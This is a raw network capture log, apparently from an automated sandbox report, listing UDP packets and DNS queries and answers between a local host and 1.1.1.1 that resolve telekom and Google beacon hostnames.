Mar 10, 2025 13:56:16.973375082 CET | 53 | 64560 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:16.973932981 CET | 53 | 62766 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:16.973944902 CET | 53 | 60792 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:16.973974943 CET | 53 | 65422 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:16.974056959 CET | 53 | 59724 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:16.974293947 CET | 53 | 56701 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:16.974706888 CET | 53 | 54544 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:16.978071928 CET | 53 | 60418 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:19.455118895 CET | 53 | 54217 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:19.601835012 CET | 49640 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:56:19.602144957 CET | 55520 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:56:19.608822107 CET | 53 | 49640 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:19.609889030 CET | 53 | 55520 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:32.891585112 CET | 53 | 50286 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:56:51.925218105 CET | 53 | 59448 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:08.749527931 CET | 138 | 138 | 192.168.2.6 | 192.168.2.255 |
Mar 10, 2025 13:57:11.895061970 CET | 53 | 65042 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:14.360652924 CET | 53 | 64064 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:17.157430887 CET | 53 | 57766 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:22.545021057 CET | 62460 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:22.545270920 CET | 58867 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:22.552171946 CET | 53 | 62460 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:22.552550077 CET | 53 | 58867 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:23.570539951 CET | 65074 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:23.570779085 CET | 62664 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:23.577538013 CET | 53 | 65074 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:23.577877998 CET | 53 | 62664 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:25.602261066 CET | 61585 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:25.609622002 CET | 53 | 61585 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:26.602212906 CET | 61585 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:26.610832930 CET | 53 | 61585 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:27.602355003 CET | 61585 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:27.609956026 CET | 53 | 61585 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:29.602288008 CET | 61585 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:29.609642029 CET | 53 | 61585 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:33.617225885 CET | 61585 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:33.624588013 CET | 53 | 61585 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:38.544322014 CET | 54778 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:38.544630051 CET | 61655 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:38.551666021 CET | 53 | 54778 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:38.553267956 CET | 53 | 61655 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:39.570425034 CET | 62720 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:39.577783108 CET | 53 | 62720 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:41.602615118 CET | 61884 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:41.610775948 CET | 53 | 61884 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:42.617147923 CET | 61884 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:42.624577045 CET | 53 | 61884 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:43.632884979 CET | 61884 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:43.640415907 CET | 53 | 61884 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:44.110605001 CET | 53 | 61924 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:45.633083105 CET | 61884 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:45.640439987 CET | 53 | 61884 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:49.648219109 CET | 61884 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:49.656246901 CET | 53 | 61884 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:54.544102907 CET | 56962 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:54.544377089 CET | 58095 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:54.551692963 CET | 53 | 56962 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:54.552601099 CET | 53 | 58095 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:55.555805922 CET | 53255 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:55.563374996 CET | 53 | 53255 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:57.587002039 CET | 54261 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:57.594692945 CET | 53 | 54261 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:58.602222919 CET | 54261 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:58.612154961 CET | 53 | 54261 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:57:59.617706060 CET | 54261 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:57:59.624851942 CET | 53 | 54261 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:01.633193016 CET | 54261 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:01.640480995 CET | 53 | 54261 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:05.633760929 CET | 54261 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:05.640793085 CET | 53 | 54261 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:10.544049978 CET | 62458 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:10.544425964 CET | 49709 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:10.551248074 CET | 53 | 62458 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:10.551520109 CET | 53 | 49709 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:11.556912899 CET | 61833 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:11.564604998 CET | 53 | 61833 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:13.587208033 CET | 52003 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:13.594760895 CET | 53 | 52003 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:14.602283001 CET | 52003 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:14.610045910 CET | 53 | 52003 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:15.617949009 CET | 52003 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:15.625202894 CET | 53 | 52003 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:17.633548021 CET | 52003 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:17.641254902 CET | 53 | 52003 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:21.649085999 CET | 52003 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:21.656322956 CET | 53 | 52003 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:26.548702955 CET | 59087 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:26.549010038 CET | 61507 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:26.555965900 CET | 53 | 59087 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:26.556370020 CET | 53 | 61507 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:27.571172953 CET | 62950 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:27.578803062 CET | 53 | 62950 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:28.459266901 CET | 53 | 55975 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:29.602279902 CET | 62796 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:29.609886885 CET | 53 | 62796 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:30.617284060 CET | 62796 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:30.624733925 CET | 53 | 62796 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:31.632826090 CET | 62796 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:31.640414000 CET | 53 | 62796 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:33.632930040 CET | 62796 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:33.640404940 CET | 53 | 62796 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:37.633405924 CET | 62796 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:37.640717983 CET | 53 | 62796 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:38.543920040 CET | 61292 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:38.544284105 CET | 64606 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:38.551018953 CET | 53 | 61292 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:38.552787066 CET | 53 | 64606 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:39.555452108 CET | 63750 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:39.555620909 CET | 58752 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:39.562696934 CET | 53 | 63750 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:39.564611912 CET | 53 | 58752 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:41.587193012 CET | 53038 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:41.594399929 CET | 53 | 53038 | 1.1.1.1 | 192.168.2.6 |
Mar 10, 2025 13:58:42.586539030 CET | 53038 | 53 | 192.168.2.6 | 1.1.1.1 |
Mar 10, 2025 13:58:42.593486071 CET | 53 | 53038 | 1.1.1.1 | 192.168.2.6 |
Timestamp | Source IP | Dest IP | Checksum | Code | Type |
---|---|---|---|---|---|
Mar 10, 2025 13:56:12.695605040 CET | 192.168.2.6 | 1.1.1.1 | c239 | (Port unreachable) | Destination Unreachable |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Mar 10, 2025 13:56:12.440768957 CET | 192.168.2.6 | 1.1.1.1 | 0x51d6 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:56:12.440937042 CET | 192.168.2.6 | 1.1.1.1 | 0x17ba | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 10, 2025 13:56:16.618657112 CET | 192.168.2.6 | 1.1.1.1 | 0x6a14 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:56:16.618815899 CET | 192.168.2.6 | 1.1.1.1 | 0xfeb6 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 10, 2025 13:56:16.964190960 CET | 192.168.2.6 | 1.1.1.1 | 0xd47d | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:56:16.964437962 CET | 192.168.2.6 | 1.1.1.1 | 0x372a | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 10, 2025 13:56:16.965164900 CET | 192.168.2.6 | 1.1.1.1 | 0x8c78 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:56:16.965313911 CET | 192.168.2.6 | 1.1.1.1 | 0xa87d | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 10, 2025 13:56:16.965759039 CET | 192.168.2.6 | 1.1.1.1 | 0x10df | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:56:16.965904951 CET | 192.168.2.6 | 1.1.1.1 | 0x3d1 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 10, 2025 13:56:16.966315985 CET | 192.168.2.6 | 1.1.1.1 | 0x996f | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:56:16.966475010 CET | 192.168.2.6 | 1.1.1.1 | 0xc2e8 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 10, 2025 13:56:16.966839075 CET | 192.168.2.6 | 1.1.1.1 | 0xb78e | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:56:16.966974974 CET | 192.168.2.6 | 1.1.1.1 | 0x3b69 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 10, 2025 13:56:16.967350006 CET | 192.168.2.6 | 1.1.1.1 | 0x7920 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:56:16.967514038 CET | 192.168.2.6 | 1.1.1.1 | 0xa90e | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 10, 2025 13:56:19.601835012 CET | 192.168.2.6 | 1.1.1.1 | 0x512e | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:56:19.602144957 CET | 192.168.2.6 | 1.1.1.1 | 0xc5d3 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 10, 2025 13:57:22.545021057 CET | 192.168.2.6 | 1.1.1.1 | 0xb141 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:57:22.545270920 CET | 192.168.2.6 | 1.1.1.1 | 0xcce6 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 10, 2025 13:57:23.570539951 CET | 192.168.2.6 | 1.1.1.1 | 0xec00 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:57:23.570779085 CET | 192.168.2.6 | 1.1.1.1 | 0x9f38 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 10, 2025 13:57:25.602261066 CET | 192.168.2.6 | 1.1.1.1 | 0x7348 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:57:26.602212906 CET | 192.168.2.6 | 1.1.1.1 | 0x7348 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:57:27.602355003 CET | 192.168.2.6 | 1.1.1.1 | 0x7348 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:57:29.602288008 CET | 192.168.2.6 | 1.1.1.1 | 0x7348 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:57:33.617225885 CET | 192.168.2.6 | 1.1.1.1 | 0x7348 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:57:38.544322014 CET | 192.168.2.6 | 1.1.1.1 | 0xb2e8 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:57:38.544630051 CET | 192.168.2.6 | 1.1.1.1 | 0x6d34 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 10, 2025 13:57:39.570425034 CET | 192.168.2.6 | 1.1.1.1 | 0x1255 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:57:41.602615118 CET | 192.168.2.6 | 1.1.1.1 | 0x5773 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:57:42.617147923 CET | 192.168.2.6 | 1.1.1.1 | 0x5773 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:57:43.632884979 CET | 192.168.2.6 | 1.1.1.1 | 0x5773 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:57:45.633083105 CET | 192.168.2.6 | 1.1.1.1 | 0x5773 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:57:49.648219109 CET | 192.168.2.6 | 1.1.1.1 | 0x5773 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:57:54.544102907 CET | 192.168.2.6 | 1.1.1.1 | 0x3f50 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:57:54.544377089 CET | 192.168.2.6 | 1.1.1.1 | 0x24f | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 10, 2025 13:57:55.555805922 CET | 192.168.2.6 | 1.1.1.1 | 0x1926 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:57:57.587002039 CET | 192.168.2.6 | 1.1.1.1 | 0xd9ce | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:57:58.602222919 CET | 192.168.2.6 | 1.1.1.1 | 0xd9ce | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:57:59.617706060 CET | 192.168.2.6 | 1.1.1.1 | 0xd9ce | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:58:01.633193016 CET | 192.168.2.6 | 1.1.1.1 | 0xd9ce | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:58:05.633760929 CET | 192.168.2.6 | 1.1.1.1 | 0xd9ce | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:58:10.544049978 CET | 192.168.2.6 | 1.1.1.1 | 0x1b9c | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:58:10.544425964 CET | 192.168.2.6 | 1.1.1.1 | 0x8cc3 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 10, 2025 13:58:11.556912899 CET | 192.168.2.6 | 1.1.1.1 | 0xce74 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:58:13.587208033 CET | 192.168.2.6 | 1.1.1.1 | 0xc633 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:58:14.602283001 CET | 192.168.2.6 | 1.1.1.1 | 0xc633 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:58:15.617949009 CET | 192.168.2.6 | 1.1.1.1 | 0xc633 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:58:17.633548021 CET | 192.168.2.6 | 1.1.1.1 | 0xc633 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:58:21.649085999 CET | 192.168.2.6 | 1.1.1.1 | 0xc633 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:58:26.548702955 CET | 192.168.2.6 | 1.1.1.1 | 0xb399 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:58:26.549010038 CET | 192.168.2.6 | 1.1.1.1 | 0x2bde | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 10, 2025 13:58:27.571172953 CET | 192.168.2.6 | 1.1.1.1 | 0x62b4 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:58:29.602279902 CET | 192.168.2.6 | 1.1.1.1 | 0xe609 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:58:30.617284060 CET | 192.168.2.6 | 1.1.1.1 | 0xe609 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:58:31.632826090 CET | 192.168.2.6 | 1.1.1.1 | 0xe609 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:58:33.632930040 CET | 192.168.2.6 | 1.1.1.1 | 0xe609 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:58:37.633405924 CET | 192.168.2.6 | 1.1.1.1 | 0xe609 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:58:38.543920040 CET | 192.168.2.6 | 1.1.1.1 | 0xb2a3 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:58:38.544284105 CET | 192.168.2.6 | 1.1.1.1 | 0x5b1b | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 10, 2025 13:58:39.555452108 CET | 192.168.2.6 | 1.1.1.1 | 0x92ea | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:58:39.555620909 CET | 192.168.2.6 | 1.1.1.1 | 0x6071 | Standard query (0) | 65 | IN (0x0001) | false | |
Mar 10, 2025 13:58:41.587193012 CET | 192.168.2.6 | 1.1.1.1 | 0x63ef | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:58:42.586539030 CET | 192.168.2.6 | 1.1.1.1 | 0x63ef | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Mar 10, 2025 13:58:42.599183083 CET | 192.168.2.6 | 1.1.1.1 | 0x1 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Mar 10, 2025 13:56:12.567388058 CET | 1.1.1.1 | 192.168.2.6 | 0x51d6 | No error (0) | 46.31.79.76 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:56:16.626147032 CET | 1.1.1.1 | 192.168.2.6 | 0x6a14 | No error (0) | 142.250.185.68 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:56:16.971725941 CET | 1.1.1.1 | 192.168.2.6 | 0xd47d | No error (0) | 62.153.158.211 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:56:16.972110987 CET | 1.1.1.1 | 192.168.2.6 | 0x8c78 | No error (0) | login.production-v.p5x.telekom.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 10, 2025 13:56:16.972110987 CET | 1.1.1.1 | 192.168.2.6 | 0x8c78 | No error (0) | login.production.p5x.telekom.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 10, 2025 13:56:16.972110987 CET | 1.1.1.1 | 192.168.2.6 | 0x8c78 | No error (0) | 80.146.236.47 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:56:16.973232031 CET | 1.1.1.1 | 192.168.2.6 | 0xa87d | No error (0) | login.production-v.p5x.telekom.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 10, 2025 13:56:16.973232031 CET | 1.1.1.1 | 192.168.2.6 | 0xa87d | No error (0) | login.production.p5x.telekom.net | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 10, 2025 13:56:16.973364115 CET | 1.1.1.1 | 192.168.2.6 | 0x3d1 | No error (0) | 65 | IN (0x0001) | false | |||
Mar 10, 2025 13:56:16.973375082 CET | 1.1.1.1 | 192.168.2.6 | 0x996f | No error (0) | 151.101.194.137 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:56:16.973375082 CET | 1.1.1.1 | 192.168.2.6 | 0x996f | No error (0) | 151.101.66.137 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:56:16.973375082 CET | 1.1.1.1 | 192.168.2.6 | 0x996f | No error (0) | 151.101.130.137 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:56:16.973375082 CET | 1.1.1.1 | 192.168.2.6 | 0x996f | No error (0) | 151.101.2.137 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:56:16.973932981 CET | 1.1.1.1 | 192.168.2.6 | 0x10df | No error (0) | 172.67.41.16 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:56:16.973932981 CET | 1.1.1.1 | 192.168.2.6 | 0x10df | No error (0) | 104.22.21.144 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:56:16.973932981 CET | 1.1.1.1 | 192.168.2.6 | 0x10df | No error (0) | 104.22.20.144 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:56:16.973974943 CET | 1.1.1.1 | 192.168.2.6 | 0x3b69 | No error (0) | 65 | IN (0x0001) | false | |||
Mar 10, 2025 13:56:16.974056959 CET | 1.1.1.1 | 192.168.2.6 | 0xb78e | No error (0) | 104.17.25.14 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:56:16.974056959 CET | 1.1.1.1 | 192.168.2.6 | 0xb78e | No error (0) | 104.17.24.14 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:56:16.974293947 CET | 1.1.1.1 | 192.168.2.6 | 0x7920 | No error (0) | 104.18.11.207 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:56:16.974293947 CET | 1.1.1.1 | 192.168.2.6 | 0x7920 | No error (0) | 104.18.10.207 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:56:16.974706888 CET | 1.1.1.1 | 192.168.2.6 | 0xa90e | No error (0) | 65 | IN (0x0001) | false | |||
Mar 10, 2025 13:56:19.608822107 CET | 1.1.1.1 | 192.168.2.6 | 0x512e | No error (0) | 62.153.158.211 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:22.552171946 CET | 1.1.1.1 | 192.168.2.6 | 0xb141 | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:22.552171946 CET | 1.1.1.1 | 192.168.2.6 | 0xb141 | No error (0) | 216.58.206.35 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:22.552550077 CET | 1.1.1.1 | 192.168.2.6 | 0xcce6 | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:23.577538013 CET | 1.1.1.1 | 192.168.2.6 | 0xec00 | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:23.577538013 CET | 1.1.1.1 | 192.168.2.6 | 0xec00 | No error (0) | 142.251.143.67 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:23.577877998 CET | 1.1.1.1 | 192.168.2.6 | 0x9f38 | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:25.609622002 CET | 1.1.1.1 | 192.168.2.6 | 0x7348 | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:25.609622002 CET | 1.1.1.1 | 192.168.2.6 | 0x7348 | No error (0) | 142.250.180.99 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:26.610832930 CET | 1.1.1.1 | 192.168.2.6 | 0x7348 | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:26.610832930 CET | 1.1.1.1 | 192.168.2.6 | 0x7348 | No error (0) | 142.250.180.99 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:27.609956026 CET | 1.1.1.1 | 192.168.2.6 | 0x7348 | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:27.609956026 CET | 1.1.1.1 | 192.168.2.6 | 0x7348 | No error (0) | 142.250.180.99 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:29.609642029 CET | 1.1.1.1 | 192.168.2.6 | 0x7348 | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:29.609642029 CET | 1.1.1.1 | 192.168.2.6 | 0x7348 | No error (0) | 142.250.180.99 | A (IP address) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:33.624588013 CET | 1.1.1.1 | 192.168.2.6 | 0x7348 | No error (0) | beacons-handoff.gcp.gvt2.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Mar 10, 2025 13:57:33.624588013 CET | 1.1.1.1 | 192.168.2.6 | 0x7348 | No error (0) | 142.250.180.99 | A (IP address) | IN (0x0001) | false | ||
